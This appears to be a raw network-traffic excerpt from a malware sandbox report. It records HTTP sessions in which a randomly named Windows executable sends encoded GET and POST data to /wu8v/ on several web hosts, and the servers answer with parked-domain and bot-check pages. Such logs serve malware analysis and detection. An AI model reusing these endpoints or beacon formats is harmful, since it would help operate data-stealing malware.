                                                                                                                    May 8, 2024 14:07:53.370606899 CEST453OUTGET /wu8v/?MdtlcTm=HNLEVoSmZQxFSmctMpTTd4dyTFjeIBcvYbInUpVYO5VLbn2V1MEgIHD38EU48JsuuCIVw/TFvn9kkkg/Sq9Xy2f3I5Wlm16rLCQIpVyEpLVAPUkeiuBH2KE=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.btpbox.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:07:53.674268961 CEST1289INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:07:53 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                    Content-Length: 5056
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 57 33 43 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 6d 20 64 65 20 64 6f 6d 61 69 6e 65 20 77 77 77 2e 62 74 70 62 6f 78 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 65 64 2e 72 65 67 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d 2f 73 74 79 6c 65 73 2f 73 74 79 6c 65 73 2d 72 65 64 69 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 6d 20 64 65 20 64 6f 6d 61 69 6e 65 20 65 6e 72 65 67 69 73 74 72 e9 20 76 69 61 20 6c 65 20 62 75 72 65 61 75 20 64 27 65 6e 72 65 67 69 73 74 72 65 6d 65 6e 74 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-/W3C/DTD HTML 4.01 Transitional/EN"><html><head><title>Nom de domaine www.btpbox.com</title><link href="https://parked.reg.bookmyname.com/styles/styles-redir.css" rel="stylesheet" type="text/css"><meta name="description" content="Nom de domaine enregistr via le bureau d'enregistrement https://www.bookmyname.com, registrar, noms de domaine"><meta name="keywords" content="deposer, rserv, protger, deposer, renouvellement, hbergement, grer, renouvellement, domaine parqu, transfrer, verifier, vente, nom de domaine, domaine IN, domaine UK, domaine COM, domaine CC, domaine CC, domaine IM, domaine NET, domaine FR, domaine BIZ, domaine UK, "><META NAME="Domain" CONTENT="parked"><META NAME="Domaine" CONTENT="parque"><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-15"></head><body><div id="main"> <div id="header"> <div id="logo"><a href="https://www.bookmyname.com/"><img src="https://parked.reg.bookmyname.com/images/logo_book.gif" al [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:53.674295902 CEST1289INData Raw: 69 6e 65 2c 20 64 69 73 63 6f 75 6e 74 22 20 62 6f 72 64 65 72 3d 22 30 22 20 68 65 69 67 68 74 3d 22 35 38 22 20 77 69 64 74 68 3d 22 31 38 30 22 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 62 61 6e 6e
                                                                                                                    Data Ascii: ine, discount" border="0" height="58" width="180"></a></div> <div id="banniere"><a href="https://www.bookmyname.com/nom_de_domaine/tarif_nom_de_domaine.html"><img src="https://parked.reg.bookmyname.com/images/fr_banniere_haut.jpg" alt=
                                                                                                                    May 8, 2024 14:07:53.674312115 CEST1289INData Raw: 62 72 3e 26 6e 62 73 70 3b 3c 62 72 3e 0a 4c 65 20 6e 6f 6d 20 64 65 20 64 6f 6d 61 69 6e 65 20 61 20 e9 74 e9 20 65 6e 72 65 67 69 73 74 72 e9 20 70 61 72 20 75 6e 20 75 74 69 6c 69 73 61 74 65 75 72 20 64 75 20 72 65 67 69 73 74 72 61 72 20 3c
                                                                                                                    Data Ascii: br>&nbsp;<br>Le nom de domaine a t enregistr par un utilisateur du registrar <a href='https://www.bookmyname.com/'>BookMyName</a> et est rserv pour une utilisation future.<br>&nbsp;<br><a href='https://www.bookmyname.com/whois_informat
                                                                                                                    May 8, 2024 14:07:53.674331903 CEST1289INData Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d 2f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 61 72 6b 65 64 2e 72 65 67 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d 2f 69 6d 61
                                                                                                                    Data Ascii: a href="http://www.bookmyname.com/"><img src="http://parked.reg.bookmyname.com/images/lien_3.gif" alt="com" border="0" height="28" width="38"></a><a href="http://www.pir.org/" onclick="window.open(this.href); return false;"><img src="http://p
                                                                                                                    May 8, 2024 14:07:53.674350023 CEST154INData Raw: 61 6c 73 65 3b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 61 72 6b 65 64 2e 72 65 67 2e 62 6f 6f 6b 6d 79 6e 61 6d 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6c 69 65 6e 5f 34 2e 67 69 66 22 20 61 6c 74 3d 22 69 63 61 6e 6e 22 20 62
                                                                                                                    Data Ascii: alse;"><img src="http://parked.reg.bookmyname.com/images/lien_4.gif" alt="icann" border="0" height="28" width="30"></a></div>--></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    37192.168.2.44978070.32.23.111802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:07:59.281984091 CEST709OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.glissy.ca
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.glissy.ca
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.glissy.ca/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 37 47 4d 2f 67 50 72 70 4c 68 49 72 39 69 34 39 51 47 69 6e 67 64 54 73 44 6e 65 52 69 2b 52 7a 63 4d 76 30 76 43 33 6e 76 35 77 47 4d 65 44 4e 4e 72 37 43 65 58 76 4c 79 33 79 46 68 63 57 46 32 76 68 71 55 58 32 2b 6a 32 53 57 5a 71 4d 45 6b 6f 30 68 4d 65 6a 47 70 31 4e 6b 67 33 5a 7a 63 71 57 50 70 6d 65 71 6d 5a 79 63 6c 74 79 79 4e 4b 72 63 6c 5a 71 6f 63 55 4d 79 4e 77 55 4a 54 74 72 4b 33 66 31 75 50 51 72 35 56 73 31 31 54 44 44 38 64 75 52 52 7a 64 79 42 68 34 39 6c 6c 78 68 38 2b 41 42 51 47 57 33 44 32 65 61 45 38 39 4b 4b 52 44 71 78 45 57 4a 2b 77 44 44 58 48 51 3d 3d
                                                                                                                    Data Ascii: MdtlcTm=7GM/gPrpLhIr9i49QGingdTsDneRi+RzcMv0vC3nv5wGMeDNNr7CeXvLy3yFhcWF2vhqUX2+j2SWZqMEko0hMejGp1Nkg3ZzcqWPpmeqmZycltyyNKrclZqocUMyNwUJTtrK3f1uPQr5Vs11TDD8duRRzdyBh49llxh8+ABQGW3D2eaE89KKRDqxEWJ+wDDXHQ==
                                                                                                                    May 8, 2024 14:07:59.501718998 CEST1289INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:07:59 GMT
                                                                                                                    Content-Length: 1489
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                    Server: imunify360-webshield/1.21
                                                                                                                    Data Raw: 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta name="robots" content="noindex, nofollow"> <title>One moment, please...</title> <style> body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center; } </style> </head><body> <h1>Please wait while your request is being verified...</h1> <form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="GET"> <input type="hidden" id="wsidchk" name="wsidchk"/> </form> <script> (function(){ var west=+((+!+[])+(+!+[]+[])+(+!+[]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+![]+[])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[] [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:59.501729965 CEST431INData Raw: 20 20 20 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 21 21 30 3b
                                                                                                                    Data Ascii: x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener('DOMContentLoaded',y,z) : document.attachEvent('onreadystatechange',y);}; y(function(){


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    38192.168.2.44978170.32.23.111802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:08:02.675647974 CEST729OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.glissy.ca
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.glissy.ca
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.glissy.ca/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 37 47 4d 2f 67 50 72 70 4c 68 49 72 38 43 49 39 54 68 2b 6e 78 74 54 6a 4a 48 65 52 6f 65 52 76 63 4d 72 30 76 41 62 33 76 72 55 47 4d 38 4c 4e 4b 6f 6a 43 5a 58 76 4c 71 6e 7a 4f 6c 63 57 4f 32 76 73 58 55 56 69 2b 6a 31 75 57 5a 76 67 45 6b 37 4d 6d 65 2b 6a 45 38 6c 4e 6d 2b 48 5a 7a 63 71 57 50 70 69 2b 4d 6d 66 61 63 6c 38 43 79 66 2b 48 62 6f 35 71 72 62 55 4d 79 4a 77 56 43 54 74 72 73 33 65 70 55 50 53 54 35 56 73 6c 31 54 58 66 2f 47 65 52 54 74 74 7a 74 6c 6f 38 37 39 6b 55 64 7a 78 38 31 47 6c 44 79 2b 34 4c 65 74 4d 72 64 44 44 4f 43 5a 52 41 4b 39 41 2b 65 63 61 33 59 33 4e 68 55 2f 79 62 62 4b 2b 79 4d 71 79 4f 76 2b 5a 51 3d
                                                                                                                    Data Ascii: MdtlcTm=7GM/gPrpLhIr8CI9Th+nxtTjJHeRoeRvcMr0vAb3vrUGM8LNKojCZXvLqnzOlcWO2vsXUVi+j1uWZvgEk7Mme+jE8lNm+HZzcqWPpi+Mmfacl8Cyf+Hbo5qrbUMyJwVCTtrs3epUPST5Vsl1TXf/GeRTttztlo879kUdzx81GlDy+4LetMrdDDOCZRAK9A+eca3Y3NhU/ybbK+yMqyOv+ZQ=
                                                                                                                    May 8, 2024 14:08:02.896075964 CEST1289INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:08:02 GMT
                                                                                                                    Content-Length: 1535
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                    Server: imunify360-webshield/1.21
                                                                                                                    Data Raw: 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta name="robots" content="noindex, nofollow"> <title>One moment, please...</title> <style> body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center; } </style> </head><body> <h1>Please wait while your request is being verified...</h1> <form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="GET"> <input type="hidden" id="wsidchk" name="wsidchk"/> </form> <script> (function(){ var west=+((+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+![])+(+!+[]+[])+(+!+[])), east=+((+!+[])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[] [TRUNCATED]
                                                                                                                    May 8, 2024 14:08:02.896090984 CEST477INData Raw: 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21
                                                                                                                    Data Ascii: +!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener('DOMContentLoaded',y,z) : document.attachEvent('on


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    39192.168.2.44978270.32.23.111802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:08:05.419578075 CEST10811OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.glissy.ca
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.glissy.ca
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.glissy.ca/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 37 47 4d 2f 67 50 72 70 4c 68 49 72 38 43 49 39 54 68 2b 6e 78 74 54 6a 4a 48 65 52 6f 65 52 76 63 4d 72 30 76 41 62 33 76 72 63 47 4e 4a 48 4e 4d 4a 6a 43 59 58 76 4c 6a 48 7a 4e 6c 63 57 66 32 76 31 63 55 56 2f 63 6a 7a 71 57 59 4a 30 45 78 36 4d 6d 48 4f 6a 45 6b 56 4e 6c 67 33 5a 71 63 75 79 4c 70 6d 53 4d 6d 66 61 63 6c 2b 61 79 49 36 72 62 37 70 71 6f 63 55 4d 75 4e 77 56 71 54 74 7a 53 33 65 39 2b 4f 69 7a 35 57 4e 56 31 57 6b 33 2f 62 75 52 56 73 74 7a 31 6c 6f 77 61 39 69 77 33 7a 78 5a 65 47 69 72 79 39 2b 72 48 31 76 58 4e 41 78 4c 63 45 54 51 50 35 53 43 53 64 4e 37 36 34 50 70 4f 70 79 4c 4e 52 4a 48 47 2f 67 32 4b 6f 5a 58 36 76 35 47 43 4e 38 31 4c 37 6c 51 72 7a 47 4c 38 68 6e 73 74 38 51 30 67 58 2f 51 32 37 56 65 44 4a 49 79 6f 39 55 39 52 77 42 76 30 30 75 6e 2b 42 78 73 37 55 6b 35 37 51 78 6b 6c 5a 56 6b 41 35 50 6f 2b 37 57 45 59 65 57 64 58 44 56 49 63 31 7a 61 39 59 32 47 78 31 32 71 31 70 5a 75 71 54 48 4b 4e 58 69 4d 65 67 2b 39 39 59 6d 58 4c 48 71 [TRUNCATED]
                                                                                                                    Data Ascii: MdtlcTm=7GM/gPrpLhIr8CI9Th+nxtTjJHeRoeRvcMr0vAb3vrcGNJHNMJjCYXvLjHzNlcWf2v1cUV/cjzqWYJ0Ex6MmHOjEkVNlg3ZqcuyLpmSMmfacl+ayI6rb7pqocUMuNwVqTtzS3e9+Oiz5WNV1Wk3/buRVstz1lowa9iw3zxZeGiry9+rH1vXNAxLcETQP5SCSdN764PpOpyLNRJHG/g2KoZX6v5GCN81L7lQrzGL8hnst8Q0gX/Q27VeDJIyo9U9RwBv00un+Bxs7Uk57QxklZVkA5Po+7WEYeWdXDVIc1za9Y2Gx12q1pZuqTHKNXiMeg+99YmXLHqDwokaPOFwnlYqynrbN4yonrbb4WD/HXFBe/HZPC0ML5EFYkUDvkCIBuIklao/Q/dVCie3EKO3ffdeHjLQ1Hz5jMNm2o6G3gqsBfKPpLrS1WSNl2XnmqgldWts7X+6fQEQUjnvgm2TxkPDP2nJ2+WHy8SMAG+8rx05jeeQrHFA14fE4uBOLRIlZ55jD5wAOkgyzAdBn812tVdtKc2XgF0tEkmK5FHXyXOVrAHA/Bz+e7iDUml5dFYBErNy2k1f5WhbIl30DDY2lKyiFFb9TX0or+aSqMyWivWfK/Mkpgvs4ar0H5LH1OWS508L4wxbJTpMZ1XwBszSvOyRj+/EmcdJSaU0wDoYdIw9msX6vE5Bp3FfBUzUCSkXeLIa1CTLnCvTafr1GrNhlpnd/oV2/i9MpC96oxKGoMg1ZZe/AoBGGMPoY2iZiUsjZ7Q3K0fGBzaAA9TrHJbDuJQFWIf56uK0lok6836zVEPHwKrySilC+zLI6YLNUUzapNS+LxciKsVWHzzWzm1h5K4LIz9mljMlyl6i9VPzhTg+3te/au/dXRp81fF0WDos1sd9TwuwuqKa1kaCXLo3W8dhKzcIW1wZjBe5KonCXhyxnhxIVt7Unn4Fq/5HLFu0RP39G6FtL4YH8v0M5jECzQ8VNgT05ISe/FPrqsj7EhFbp [TRUNCATED]
                                                                                                                    May 8, 2024 14:08:05.639544010 CEST1289INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:08:05 GMT
                                                                                                                    Content-Length: 1489
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                    Server: imunify360-webshield/1.21
                                                                                                                    Data Raw: 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta name="robots" content="noindex, nofollow"> <title>One moment, please...</title> <style> body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center; } </style> </head><body> <h1>Please wait while your request is being verified...</h1> <form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="GET"> <input type="hidden" id="wsidchk" name="wsidchk"/> </form> <script> (function(){ var west=+((+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+![])), east=+((+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!! [TRUNCATED]
                                                                                                                    May 8, 2024 14:08:05.639559031 CEST431INData Raw: 20 20 20 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 21 21 30 3b
                                                                                                                    Data Ascii: x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener('DOMContentLoaded',y,z) : document.attachEvent('onreadystatechange',y);}; y(function(){


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    40192.168.2.44978370.32.23.111802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:08:08.168732882 CEST452OUTGET /wu8v/?MdtlcTm=2Ekfj6jdIBk36xhcbV2ym43lHRKg6LV7IJvggRD/yKlDT5fLDaqmfwfg0kC4k4WA5tpgDGvB1m7jQvkf/ooPPLzV8n4D4xVHdcGXqhGJgd2fmMm1GJzEmqU=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.glissy.ca
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:08:08.388655901 CEST1289INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:08:08 GMT
                                                                                                                    Content-Length: 1570
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                    Server: imunify360-webshield/1.21
